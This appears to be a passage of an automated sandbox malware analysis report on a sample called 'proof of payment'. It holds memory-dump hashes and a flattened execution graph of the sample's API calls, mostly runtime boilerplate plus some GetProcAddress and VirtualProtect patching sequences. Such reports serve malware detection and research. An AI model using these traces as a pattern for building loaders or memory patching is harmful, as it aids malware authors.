                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: feb5fbeb7bb8dc5869080c84851c5b24aa84538be3f95ab40deb33862804f703
                                      • Instruction ID: 3e093b9f5c3357d77764a93893a2625e321464a65694e219770eb90cf9481df0
                                      • Opcode Fuzzy Hash: feb5fbeb7bb8dc5869080c84851c5b24aa84538be3f95ab40deb33862804f703
                                      • Instruction Fuzzy Hash: 25210671504304DFEB04DF10D9C0B16BB65FB99314F20C169D80A8BA56C33AE856CAA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddcc6932fba6d5312b73296a1dfee6ef8891c93e34a41932bfb2889cf72a8df5
                                      • Instruction ID: abf1dd1f49cc6cf8d1b718e1edbc406eb520bcdcf9398ce52a2da771c9112870
                                      • Opcode Fuzzy Hash: ddcc6932fba6d5312b73296a1dfee6ef8891c93e34a41932bfb2889cf72a8df5
                                      • Instruction Fuzzy Hash: 8D213471604B04EFDB14EF10D8C0B66BB61FB88318F20C56DD80A8B382D33AD847CA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9425844ac4bcf1433972871f882bf492c9386ab3523422e3e73129faef664857
                                      • Instruction ID: 1933d80212d31baa83fdd9660a77541d3472d2e7ee2742a5a5dcc45722d2e575
                                      • Opcode Fuzzy Hash: 9425844ac4bcf1433972871f882bf492c9386ab3523422e3e73129faef664857
                                      • Instruction Fuzzy Hash: F3210471504384EFDB05DF50D9C0B66BBA5FB88318F20C56DE8498B392D336E856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f41a0fca627053da53c75c85b103fc3433e304776dd91e4e36054f1a2230e87
                                      • Instruction ID: 1039eb94571cf32d9dec3473e03725bc26a0f14679308b3e5179669e44af39b3
                                      • Opcode Fuzzy Hash: 5f41a0fca627053da53c75c85b103fc3433e304776dd91e4e36054f1a2230e87
                                      • Instruction Fuzzy Hash: 6F2180755087809FCB02DF14D994B11BFB1FB46314F28C5EAD8498F2A7D33A985ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction ID: 1cebd036886ea95c5cad214c8f85750a988d52ddc4d0dd88b13b188faa013d42
• Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction Fuzzy Hash: 14110376404340CFDB01CF00D5C4B16BF71FB98324F24C2A9D80A8BA56C33AE85ACBA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction ID: e9cd449e215febec680b3a4f8747c77be64a5610ef6819ff15a2645a65028188
• Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction Fuzzy Hash: 2311D376904380CFDB15CF10D5C4B1ABF71FB94318F24C6A9D84A8BA56C336D85ACBA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1497668045.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8bd000_proof of payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
• Instruction ID: 26628870da69c7012b33806af39cf947e2fe4a5c741f22b87cce531fdbf140c9
• Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
• Instruction Fuzzy Hash: AC118B75504280EFCB15CF10D5C4B55BFA2FB84314F24C6A9D8498B796D33AE84ACB61
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99bf154f43f7e2146dd7a3f3e0081d3ed65950a33ab6f3c4338175b5437dafee
• Instruction ID: e538cdd4f9ffdfc44479975a1591c3a13c7567eb4796d50d235d67af1f9e9093
• Opcode Fuzzy Hash: 99bf154f43f7e2146dd7a3f3e0081d3ed65950a33ab6f3c4338175b5437dafee
• Instruction Fuzzy Hash: 48A15A32A002098FCF15DFB4D8405AEB7B2FF85301B19457AEC05AF265DB71E94ACBA0
Uniqueness
• Uniqueness Score: -1.00%
Execution Graph

• Execution Coverage: 2.6%
• Dynamic/Decrypted Code Coverage: 100%
• Signature Coverage: 2.6%
• Total number of Nodes: 1673
• Total number of Limit Nodes: 5
RtlEnterCriticalSection 6034->6046 6036 100047aa 6047 100047dc 6036->6047 6038 100047d1 _abort 6038->6022 6040 10002ae3 6039->6040 6041 10002ae5 IsProcessorFeaturePresent 6039->6041 6040->6021 6043 10002b58 6041->6043 6051 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6043->6051 6045 10002c3b 6045->6021 6046->6036 6050 100056b9 RtlLeaveCriticalSection 6047->6050 6049 100047e3 6049->6038 6050->6049 6051->6045 6055 10005b7a GetLastError 6052->6055 6056 10005b93 6055->6056 6057 10005b99 6055->6057 6074 10005e08 6056->6074 6061 10005bf0 SetLastError 6057->6061 6081 1000637b 6057->6081 6063 10005bf9 6061->6063 6062 10005bb3 6088 1000571e 6062->6088 6063->6027 6067 10005bb9 6069 10005be7 SetLastError 6067->6069 6068 10005bcf 6101 1000593c 6068->6101 6069->6063 6072 1000571e _free 17 API calls 6073 10005be0 6072->6073 6073->6061 6073->6069 6106 10005c45 6074->6106 6076 10005e2f 6077 10005e47 TlsGetValue 6076->6077 6080 10005e3b 6076->6080 6077->6080 6078 10002ada _ValidateLocalCookies 5 API calls 6079 10005e58 6078->6079 6079->6057 6080->6078 6086 10006388 _free 6081->6086 6082 100063c8 6084 10006368 _free 19 API calls 6082->6084 6083 100063b3 RtlAllocateHeap 6085 10005bab 6083->6085 6083->6086 6084->6085 6085->6062 6094 10005e5e 6085->6094 6086->6082 6086->6083 6087 1000474f _free 7 API calls 6086->6087 6087->6086 6089 10005752 _free 6088->6089 6090 10005729 HeapFree 6088->6090 6089->6067 6090->6089 6091 1000573e 6090->6091 6092 10006368 _free 18 API calls 6091->6092 6093 10005744 GetLastError 6092->6093 6093->6089 6095 10005c45 _free 5 API calls 6094->6095 6096 10005e85 6095->6096 6097 10005ea0 TlsSetValue 6096->6097 6100 10005e94 6096->6100 6097->6100 6098 10002ada _ValidateLocalCookies 5 API calls 6099 10005bc8 6098->6099 6099->6062 6099->6068 6100->6098 6112 10005914 6101->6112 6107 10005c71 6106->6107 6108 10005c75 __crt_fast_encode_pointer 6106->6108 6107->6108 6109 10005ce1 _free LoadLibraryExW GetLastError 
LoadLibraryExW FreeLibrary 6107->6109 6111 10005c95 6107->6111 6108->6076 6109->6107 6110 10005ca1 GetProcAddress 6110->6108 6111->6108 6111->6110 6113 10005854 _free RtlEnterCriticalSection RtlLeaveCriticalSection 6112->6113 6114 10005938 6113->6114 6115 100058c4 6114->6115 6116 10005758 _free 20 API calls 6115->6116 6117 100058e8 6116->6117 6117->6072 6119 10001ca6 _strlen 6118->6119 6119->6014 7022 100020db 7024 100020e7 ___scrt_is_nonwritable_in_current_image 7022->7024 7023 10002110 dllmain_raw 7025 1000212a 7023->7025 7033 100020f6 7023->7033 7024->7023 7029 1000210b 7024->7029 7024->7033 7035 10001eec 7025->7035 7027 10002177 7028 10001eec 31 API calls 7027->7028 7027->7033 7030 1000218a 7028->7030 7029->7027 7032 10001eec 31 API calls 7029->7032 7029->7033 7031 10002193 dllmain_raw 7030->7031 7030->7033 7031->7033 7034 1000216d dllmain_raw 7032->7034 7034->7027 7036 10001ef7 7035->7036 7037 10001f2a dllmain_crt_process_detach 7035->7037 7038 10001f1c dllmain_crt_process_attach 7036->7038 7039 10001efc 7036->7039 7044 10001f06 7037->7044 7038->7044 7040 10001f01 7039->7040 7041 10001f12 7039->7041 7040->7044 7045 1000240b 7040->7045 7050 100023ec 7041->7050 7044->7029 7058 100053e5 7045->7058 7156 10003513 7050->7156 7053 100023f5 7053->7044 7056 10002408 7056->7044 7057 1000351e 7 API calls 7057->7053 7064 10005aca 7058->7064 7061 1000351e 7140 10003820 7061->7140 7063 10002415 7063->7044 7065 10005ad4 7064->7065 7068 10002410 7064->7068 7066 10005e08 _free 11 API calls 7065->7066 7067 10005adb 7066->7067 7067->7068 7069 10005e5e _free 11 API calls 7067->7069 7068->7061 7070 10005aee 7069->7070 7072 100059b5 7070->7072 7073 100059c0 7072->7073 7074 100059d0 7072->7074 7078 100059d6 7073->7078 7074->7068 7077 1000571e _free 20 API calls 7077->7074 7079 100059ef 7078->7079 7080 100059e9 7078->7080 7082 1000571e _free 20 API calls 7079->7082 7081 1000571e _free 20 API calls 7080->7081 7081->7079 7083 100059fb 7082->7083 7084 1000571e _free 20 API calls 
7083->7084 7085 10005a06 7084->7085 7086 1000571e _free 20 API calls 7085->7086 7087 10005a11 7086->7087 7088 1000571e _free 20 API calls 7087->7088 7089 10005a1c 7088->7089 7090 1000571e _free 20 API calls 7089->7090 7091 10005a27 7090->7091 7092 1000571e _free 20 API calls 7091->7092 7093 10005a32 7092->7093 7094 1000571e _free 20 API calls 7093->7094 7095 10005a3d 7094->7095 7096 1000571e _free 20 API calls 7095->7096 7097 10005a48 7096->7097 7098 1000571e _free 20 API calls 7097->7098 7099 10005a56 7098->7099 7104 1000589c 7099->7104 7110 100057a8 7104->7110 7106 100058c0 7107 100058ec 7106->7107 7123 10005809 7107->7123 7109 10005910 7109->7077 7111 100057b4 ___scrt_is_nonwritable_in_current_image 7110->7111 7118 10005671 RtlEnterCriticalSection 7111->7118 7114 100057be 7115 1000571e _free 20 API calls 7114->7115 7117 100057e8 7114->7117 7115->7117 7116 100057f5 _abort 7116->7106 7119 100057fd 7117->7119 7118->7114 7122 100056b9 RtlLeaveCriticalSection 7119->7122 7121 10005807 7121->7116 7122->7121 7124 10005815 ___scrt_is_nonwritable_in_current_image 7123->7124 7131 10005671 RtlEnterCriticalSection 7124->7131 7126 1000581f 7132 10005a7f 7126->7132 7128 10005832 7136 10005848 7128->7136 7130 10005840 _abort 7130->7109 7131->7126 7133 10005ab5 __fassign 7132->7133 7134 10005a8e __fassign 7132->7134 7133->7128 7134->7133 7135 10007cc2 __fassign 20 API calls 7134->7135 7135->7133 7139 100056b9 RtlLeaveCriticalSection 7136->7139 7138 10005852 7138->7130 7139->7138 7141 1000382d 7140->7141 7145 1000384b ___vcrt_freefls@4 7140->7145 7142 1000383b 7141->7142 7146 10003b67 7141->7146 7151 10003ba2 7142->7151 7145->7063 7147 10003a82 try_get_function 5 API calls 7146->7147 7148 10003b81 7147->7148 7149 10003b99 TlsGetValue 7148->7149 7150 10003b8d 7148->7150 7149->7150 7150->7142 7152 10003a82 try_get_function 5 API calls 7151->7152 7153 10003bbc 7152->7153 7154 10003bd7 TlsSetValue 7153->7154 7155 10003bcb 7153->7155 7154->7155 7155->7145 7162 10003856 7156->7162 7158 
100023f1 7158->7053 7159 100053da 7158->7159 7160 10005b7a _free 20 API calls 7159->7160 7161 100023fd 7160->7161 7161->7056 7161->7057 7163 10003862 GetLastError 7162->7163 7164 1000385f 7162->7164 7165 10003b67 ___vcrt_FlsGetValue 6 API calls 7163->7165 7164->7158 7166 10003877 7165->7166 7167 100038dc SetLastError 7166->7167 7168 10003ba2 ___vcrt_FlsSetValue 6 API calls 7166->7168 7173 10003896 7166->7173 7167->7158 7169 10003890 7168->7169 7170 100038b8 7169->7170 7171 10003ba2 ___vcrt_FlsSetValue 6 API calls 7169->7171 7169->7173 7172 10003ba2 ___vcrt_FlsSetValue 6 API calls 7170->7172 7170->7173 7171->7170 7172->7173 7173->7167 6143 1000281c 6146 10002882 6143->6146 6149 10003550 6146->6149 6148 1000282a 6150 1000355d 6149->6150 6153 1000358a 6149->6153 6151 100047e5 ___std_exception_copy 21 API calls 6150->6151 6150->6153 6152 1000357a 6151->6152 6152->6153 6155 1000544d 6152->6155 6153->6148 6156 1000545a 6155->6156 6157 10005468 6155->6157 6156->6157 6162 1000547f 6156->6162 6158 10006368 _free 20 API calls 6157->6158 6159 10005470 6158->6159 6164 100062ac 6159->6164 6161 1000547a 6161->6153 6162->6161 6163 10006368 _free 20 API calls 6162->6163 6163->6159 6167 10006231 6164->6167 6166 100062b8 6166->6161 6168 10005b7a _free 20 API calls 6167->6168 6169 10006247 6168->6169 6170 10006255 6169->6170 6171 100062a6 6169->6171 6175 10002ada _ValidateLocalCookies 5 API calls 6170->6175 6178 100062bc IsProcessorFeaturePresent 6171->6178 6173 100062ab 6174 10006231 _abort 26 API calls 6173->6174 6176 100062b8 6174->6176 6177 1000627c 6175->6177 6176->6166 6177->6166 6179 100062c7 6178->6179 6182 100060e2 6179->6182 6183 100060fe ___scrt_fastfail 6182->6183 6184 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6183->6184 6187 100061fb ___scrt_fastfail 6184->6187 6185 10002ada _ValidateLocalCookies 5 API calls 6186 10006219 GetCurrentProcess TerminateProcess 6185->6186 6186->6173 6187->6185 7792 10004bdd 7793 10004c08 7792->7793 7794 
10004bec 7792->7794 7796 10006d60 51 API calls 7793->7796 7794->7793 7795 10004bf2 7794->7795 7797 10006368 _free 20 API calls 7795->7797 7798 10004c0f GetModuleFileNameA 7796->7798 7799 10004bf7 7797->7799 7800 10004c33 7798->7800 7801 100062ac _abort 26 API calls 7799->7801 7815 10004d01 7800->7815 7812 10004c01 7801->7812 7806 10004c72 7809 10004d01 38 API calls 7806->7809 7807 10004c66 7808 10006368 _free 20 API calls 7807->7808 7814 10004c6b 7808->7814 7811 10004c88 7809->7811 7810 1000571e _free 20 API calls 7810->7812 7813 1000571e _free 20 API calls 7811->7813 7811->7814 7813->7814 7814->7810 7817 10004d26 7815->7817 7819 10004d86 7817->7819 7827 100070eb 7817->7827 7818 10004c50 7821 10004e76 7818->7821 7819->7818 7820 100070eb 38 API calls 7819->7820 7820->7819 7822 10004e8b 7821->7822 7823 10004c5d 7821->7823 7822->7823 7824 1000637b _free 20 API calls 7822->7824 7823->7806 7823->7807 7825 10004eb9 7824->7825 7826 1000571e _free 20 API calls 7825->7826 7826->7823 7830 10007092 7827->7830 7831 100054a7 __fassign 38 API calls 7830->7831 7832 100070a6 7831->7832 7832->7817 6679 10007260 GetStartupInfoW 6680 10007286 6679->6680 6681 10007318 6679->6681 6680->6681 6685 10008be3 6680->6685 6683 100072af 6683->6681 6684 100072dd GetFileType 6683->6684 6684->6683 6686 10008bef ___scrt_is_nonwritable_in_current_image 6685->6686 6687 10008c13 6686->6687 6688 10008bfc 6686->6688 6698 10005671 RtlEnterCriticalSection 6687->6698 6689 10006368 _free 20 API calls 6688->6689 6691 10008c01 6689->6691 6692 100062ac _abort 26 API calls 6691->6692 6693 10008c0b _abort 6692->6693 6693->6683 6694 10008c4b 6706 10008c72 6694->6706 6696 10008c1f 6696->6694 6699 10008b34 6696->6699 6698->6696 6700 1000637b _free 20 API calls 6699->6700 6702 10008b46 6700->6702 6701 10008b53 6703 1000571e _free 20 API calls 6701->6703 6702->6701 6704 10005eb7 11 API calls 6702->6704 6705 10008ba5 6703->6705 6704->6702 6705->6696 6709 100056b9 RtlLeaveCriticalSection 6706->6709 6708 10008c79 
6708->6693 6709->6708 7687 100081a0 7688 100081d9 7687->7688 7689 100081dd 7688->7689 7700 10008205 7688->7700 7690 10006368 _free 20 API calls 7689->7690 7692 100081e2 7690->7692 7691 10008529 7693 10002ada _ValidateLocalCookies 5 API calls 7691->7693 7694 100062ac _abort 26 API calls 7692->7694 7696 10008536 7693->7696 7695 100081ed 7694->7695 7697 10002ada _ValidateLocalCookies 5 API calls 7695->7697 7698 100081f9 7697->7698 7700->7691 7701 100080c0 7700->7701 7704 100080db 7701->7704 7702 10002ada _ValidateLocalCookies 5 API calls 7703 10008152 7702->7703 7703->7700 7704->7702 7833 1000a1e0 7836 1000a1fe 7833->7836 7835 1000a1f6 7837 1000a203 7836->7837 7838 1000aa53 21 API calls 7837->7838 7840 1000a298 7837->7840 7839 1000a42f 7838->7839 7839->7835 7840->7835 7659 10009d61 7660 10009d81 7659->7660 7663 10009db8 7660->7663 7662 10009dab 7664 10009dbf 7663->7664 7665 10009e20 7664->7665 7669 10009ddf 7664->7669 7666 1000aa17 21 API calls 7665->7666 7667 1000a90e 7665->7667 7668 10009e6e 7666->7668 7667->7662 7668->7662 7669->7667 7670 1000aa17 21 API calls 7669->7670 7671 1000a93e 7670->7671 7671->7662 7705 100021a1 ___scrt_dllmain_exception_filter 5862 1000c7a7 5863 1000c7be 5862->5863 5867 1000c82c 5862->5867 5863->5867 5874 1000c7e6 GetModuleHandleA 5863->5874 5865 1000c835 GetModuleHandleA 5868 1000c83f 5865->5868 5866 1000c872 5867->5865 5867->5866 5867->5868 5868->5867 5869 1000c85f GetProcAddress 5868->5869 5869->5867 5870 1000c7dd 5870->5867 5870->5868 5871 1000c800 GetProcAddress 5870->5871 5871->5867 5872 1000c80d VirtualProtect 5871->5872 5872->5867 5873 1000c81c VirtualProtect 5872->5873 5873->5867 5875 1000c7ef 5874->5875 5883 1000c82c 5874->5883 5886 1000c803 GetProcAddress 5875->5886 5877 1000c835 GetModuleHandleA 5882 1000c83f 5877->5882 5878 1000c7f4 5880 1000c800 GetProcAddress 5878->5880 5878->5883 5879 1000c872 5881 1000c80d VirtualProtect 5880->5881 5880->5883 5881->5883 5884 1000c81c VirtualProtect 5881->5884 5882->5883 5885 1000c85f 
GetProcAddress 5882->5885 5883->5877 5883->5879 5883->5882 5884->5883 5885->5883 5887 1000c82c 5886->5887 5888 1000c80d VirtualProtect 5886->5888 5890 1000c872 5887->5890 5891 1000c835 GetModuleHandleA 5887->5891 5888->5887 5889 1000c81c VirtualProtect 5888->5889 5889->5887 5893 1000c83f 5891->5893 5892 1000c85f GetProcAddress 5892->5893 5893->5887 5893->5892 6188 1000742b 6189 10007430 6188->6189 6191 10007453 6189->6191 6192 10008bae 6189->6192 6193 10008bdd 6192->6193 6194 10008bbb 6192->6194 6193->6189 6195 10008bd7 6194->6195 6196 10008bc9 RtlDeleteCriticalSection 6194->6196 6197 1000571e _free 20 API calls 6195->6197 6196->6195 6196->6196 6197->6193 6710 1000ac6b 6711 1000ac84 __startOneArgErrorHandling 6710->6711 6713 1000acad __startOneArgErrorHandling 6711->6713 6714 1000b2f0 6711->6714 6715 1000b329 __startOneArgErrorHandling 6714->6715 6717 1000b350 __startOneArgErrorHandling 6715->6717 6725 1000b5c1 6715->6725 6718 1000b393 6717->6718 6719 1000b36e 6717->6719 6738 1000b8b2 6718->6738 6729 1000b8e1 6719->6729 6722 1000b38e __startOneArgErrorHandling 6723 10002ada _ValidateLocalCookies 5 API calls 6722->6723 6724 1000b3b7 6723->6724 6724->6713 6726 1000b5ec __raise_exc 6725->6726 6727 1000b7e5 RaiseException 6726->6727 6728 1000b7fd 6727->6728 6728->6717 6730 1000b8f0 6729->6730 6731 1000b964 __startOneArgErrorHandling 6730->6731 6732 1000b90f __startOneArgErrorHandling 6730->6732 6734 1000b8b2 __startOneArgErrorHandling 20 API calls 6731->6734 6745 100078a3 6732->6745 6737 1000b95d 6734->6737 6736 1000b8b2 __startOneArgErrorHandling 20 API calls 6736->6737 6737->6722 6739 1000b8d4 6738->6739 6740 1000b8bf 6738->6740 6742 10006368 _free 20 API calls 6739->6742 6741 1000b8d9 6740->6741 6743 10006368 _free 20 API calls 6740->6743 6741->6722 6742->6741 6744 1000b8cc 6743->6744 6744->6722 6746 100078cb 6745->6746 6747 10002ada _ValidateLocalCookies 5 API calls 6746->6747 6748 100078e8 6747->6748 6748->6736 6748->6737 6967 100060ac 6968 100060dd 6967->6968 
6970 100060b7 6967->6970 6969 100060c7 FreeLibrary 6969->6970 6970->6968 6970->6969 6749 1000506f 6750 10005081 6749->6750 6751 10005087 6749->6751 6753 10005000 6750->6753 6754 1000502a 6753->6754 6755 1000500d 6753->6755 6754->6751 6756 10005024 6755->6756 6757 1000571e _free 20 API calls 6755->6757 6758 1000571e _free 20 API calls 6756->6758 6757->6755 6758->6754 6198 10005630 6199 1000563b 6198->6199 6201 10005664 6199->6201 6202 10005660 6199->6202 6204 10005eb7 6199->6204 6211 10005688 6201->6211 6205 10005c45 _free 5 API calls 6204->6205 6206 10005ede 6205->6206 6207 10005efc InitializeCriticalSectionAndSpinCount 6206->6207 6208 10005ee7 6206->6208 6207->6208 6209 10002ada _ValidateLocalCookies 5 API calls 6208->6209 6210 10005f13 6209->6210 6210->6199 6212 100056b4 6211->6212 6213 10005695 6211->6213 6212->6202 6214 1000569f RtlDeleteCriticalSection 6213->6214 6214->6212 6214->6214 7672 10003370 7683 10003330 7672->7683 7684 10003342 7683->7684 7685 1000334f 7683->7685 7686 10002ada _ValidateLocalCookies 5 API calls 7684->7686 7686->7685 7841 100063f0 7842 10006400 7841->7842 7851 10006416 7841->7851 7843 10006368 _free 20 API calls 7842->7843 7844 10006405 7843->7844 7845 100062ac _abort 26 API calls 7844->7845 7847 1000640f 7845->7847 7846 10004e76 20 API calls 7853 100064e5 7846->7853 7848 10006480 7848->7846 7848->7848 7850 100064ee 7852 1000571e _free 20 API calls 7850->7852 7851->7848 7854 10006561 7851->7854 7860 10006580 7851->7860 7852->7854 7853->7850 7857 10006573 7853->7857 7871 100085eb 7853->7871 7880 1000679a 7854->7880 7858 100062bc _abort 11 API calls 7857->7858 7859 1000657f 7858->7859 7861 1000658c 7860->7861 7861->7861 7862 1000637b _free 20 API calls 7861->7862 7863 100065ba 7862->7863 7864 100085eb 26 API calls 7863->7864 7865 100065e6 7864->7865 7866 100062bc _abort 11 API calls 7865->7866 7867 10006615 ___scrt_fastfail 7866->7867 7868 100066b6 FindFirstFileExA 7867->7868 7869 10006705 7868->7869 7870 10006580 26 API calls 7869->7870 
7873 1000853a 7871->7873 7872 1000854f 7874 10006368 _free 20 API calls 7872->7874 7875 10008554 7872->7875 7873->7872 7873->7875 7878 1000858b 7873->7878 7876 1000857a 7874->7876 7875->7853 7877 100062ac _abort 26 API calls 7876->7877 7877->7875 7878->7875 7879 10006368 _free 20 API calls 7878->7879 7879->7876 7881 100067a4 7880->7881 7882 100067b4 7881->7882 7883 1000571e _free 20 API calls 7881->7883 7884 1000571e _free 20 API calls 7882->7884 7883->7881 7885 100067bb 7884->7885 7885->7847 6759 10009e71 6760 10009e95 6759->6760 6761 10009ee6 6760->6761 6763 10009f71 __startOneArgErrorHandling 6760->6763 6764 10009ef8 6761->6764 6767 1000aa53 6761->6767 6765 1000b2f0 21 API calls 6763->6765 6766 1000acad __startOneArgErrorHandling 6763->6766 6765->6766 6768 1000aa70 RtlDecodePointer 6767->6768 6770 1000aa80 6767->6770 6768->6770 6769 10002ada _ValidateLocalCookies 5 API calls 6772 1000ac67 6769->6772 6771 1000ab0d 6770->6771 6773 1000ab02 6770->6773 6775 1000aab7 6770->6775 6771->6773 6774 10006368 _free 20 API calls 6771->6774 6772->6764 6773->6769 6774->6773 6775->6773 6776 10006368 _free 20 API calls 6775->6776 6776->6773 6975 10003eb3 6976 10005411 38 API calls 6975->6976 6977 10003ebb 6976->6977 6215 1000543d 6216 10005440 6215->6216 6219 100055a8 6216->6219 6230 10007613 6219->6230 6222 100055b8 6224 100055c2 IsProcessorFeaturePresent 6222->6224 6225 100055e0 6222->6225 6226 100055cd 6224->6226 6260 10004bc1 6225->6260 6228 100060e2 _abort 8 API calls 6226->6228 6228->6225 6263 10007581 6230->6263 6233 1000766e 6234 1000767a _abort 6233->6234 6235 10005b7a _free 20 API calls 6234->6235 6239 100076a7 _abort 6234->6239 6242 100076a1 _abort 6234->6242 6235->6242 6236 100076f3 6237 10006368 _free 20 API calls 6236->6237 6238 100076f8 6237->6238 6240 100062ac _abort 26 API calls 6238->6240 6245 1000771f 6239->6245 6277 10005671 RtlEnterCriticalSection 6239->6277 6259 100076d6 6240->6259 6242->6236 6242->6239 6242->6259 6247 1000777e 6245->6247 6249 10007776 
6245->6249 6256 100077a9 6245->6256 6278 100056b9 RtlLeaveCriticalSection 6245->6278 6247->6256 6279 10007665 6247->6279 6250 10004bc1 _abort 28 API calls 6249->6250 6250->6247 6255 10007665 _abort 38 API calls 6255->6256 6282 1000782e 6256->6282 6257 1000780c 6258 10005af6 _abort 38 API calls 6257->6258 6257->6259 6258->6259 6306 1000bdc9 6259->6306 6310 1000499b 6260->6310 6266 10007527 6263->6266 6265 100055ad 6265->6222 6265->6233 6267 10007533 ___scrt_is_nonwritable_in_current_image 6266->6267 6272 10005671 RtlEnterCriticalSection 6267->6272 6269 10007541 6273 10007575 6269->6273 6271 10007568 _abort 6271->6265 6272->6269 6276 100056b9 RtlLeaveCriticalSection 6273->6276 6275 1000757f 6275->6271 6276->6275 6277->6245 6278->6249 6280 10005af6 _abort 38 API calls 6279->6280 6281 1000766a 6280->6281 6281->6255 6283 10007834 6282->6283 6284 100077fd 6282->6284 6309 100056b9 RtlLeaveCriticalSection 6283->6309 6284->6257 6284->6259 6286 10005af6 GetLastError 6284->6286 6287 10005b12 6286->6287 6288 10005b0c 6286->6288 6289 1000637b _free 20 API calls 6287->6289 6292 10005b61 SetLastError 6287->6292 6290 10005e08 _free 11 API calls 6288->6290 6291 10005b24 6289->6291 6290->6287 6293 10005e5e _free 11 API calls 6291->6293 6297 10005b2c 6291->6297 6292->6257 6295 10005b41 6293->6295 6294 1000571e _free 20 API calls 6296 10005b32 6294->6296 6295->6297 6298 10005b48 6295->6298 6299 10005b6d SetLastError 6296->6299 6297->6294 6300 1000593c _free 20 API calls 6298->6300 6301 100055a8 _abort 35 API calls 6299->6301 6302 10005b53 6300->6302 6303 10005b79 6301->6303 6304 1000571e _free 20 API calls 6302->6304 6305 10005b5a 6304->6305 6305->6292 6305->6299 6307 10002ada _ValidateLocalCookies 5 API calls 6306->6307 6308 1000bdd4 6307->6308 6308->6308 6309->6284 6311 100049a7 _abort 6310->6311 6312 100049bf 6311->6312 6332 10004af5 GetModuleHandleW 6311->6332 6341 10005671 RtlEnterCriticalSection 6312->6341 6316 10004a65 6349 10004aa5 6316->6349 6320 10004a3c 6324 10004a54 
6320->6324 6345 10004669 6320->6345 6321 100049c7 6321->6316 6321->6320 6342 1000527a 6321->6342 6322 10004a82 6352 10004ab4 6322->6352 6323 10004aae 6328 1000bdc9 _abort 5 API calls 6323->6328 6325 10004669 _abort 5 API calls 6324->6325 6325->6316 6331 10004ab3 6328->6331 6333 100049b3 6332->6333 6333->6312 6334 10004b39 GetModuleHandleExW 6333->6334 6335 10004b63 GetProcAddress 6334->6335 6338 10004b78 6334->6338 6335->6338 6336 10004b95 6339 10002ada _ValidateLocalCookies 5 API calls 6336->6339 6337 10004b8c FreeLibrary 6337->6336 6338->6336 6338->6337 6340 10004b9f 6339->6340 6340->6312 6341->6321 6360 10005132 6342->6360 6347 10004698 6345->6347 6346 10002ada _ValidateLocalCookies 5 API calls 6348 100046c1 6346->6348 6347->6346 6348->6324 6382 100056b9 RtlLeaveCriticalSection 6349->6382 6351 10004a7e 6351->6322 6351->6323 6383 10006025 6352->6383 6355 10004ae2 6357 10004b39 _abort 8 API calls 6355->6357 6356 10004ac2 GetPEB 6356->6355 6358 10004ad2 GetCurrentProcess TerminateProcess 6356->6358 6359 10004aea ExitProcess 6357->6359 6358->6355 6363 100050e1 6360->6363 6362 10005156 6362->6320 6364 100050ed ___scrt_is_nonwritable_in_current_image 6363->6364 6371 10005671 RtlEnterCriticalSection 6364->6371 6366 100050fb 6372 1000515a 6366->6372 6370 10005119 _abort 6370->6362 6371->6366 6375 10005182 6372->6375 6376 1000517a 6372->6376 6373 10002ada _ValidateLocalCookies 5 API calls 6374 10005108 6373->6374 6378 10005126 6374->6378 6375->6376 